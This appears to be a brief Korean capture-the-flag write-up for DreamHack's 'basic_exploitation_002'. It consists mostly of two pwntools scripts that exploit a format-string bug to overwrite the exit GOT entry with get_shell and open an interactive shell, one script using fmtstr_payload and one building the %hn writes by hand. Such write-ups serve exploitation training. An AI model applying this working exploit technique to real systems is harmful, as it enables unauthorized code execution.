[DreamHack] basic_exploitation_002

 

offset = 1

 

offset에서 return address까지 거리 계산 : 0x21

 

#!/usr/bin/python 
from pwn import *

#p = process("./basic_exploitation_002")
p = remote("host1.dreamhack.games", 8239)
elf = ELF("./basic_exploitation_002")
get_shell = elf.symbols['get_shell']
exit_got = elf.got['exit']

# offset = 1
p.sendline(fmtstr_payload(1, {exit_got: get_shell}))

p.interactive()

#!/usr/bin/python 
from pwn import *

p = process("./basic_exploitation_002")
elf = ELF("./basic_exploitation_002")
exit_got = elf.got['exit']
get_shell = 0x8048609

pay = p32(exit_got+2) #4byte
pay += p32(exit_got) #4byte
pay += '%{}c'.format(0x0804-0x8)
pay += '%1$hn'
pay += '%{}x'.format(0x8609-0x0804)
pay += '%2$hn'

p.sendline(pay)

p.interactive()

 

x86이라 offset만 알면 pwntools의 fmtstr_payload를 사용할 수 있다.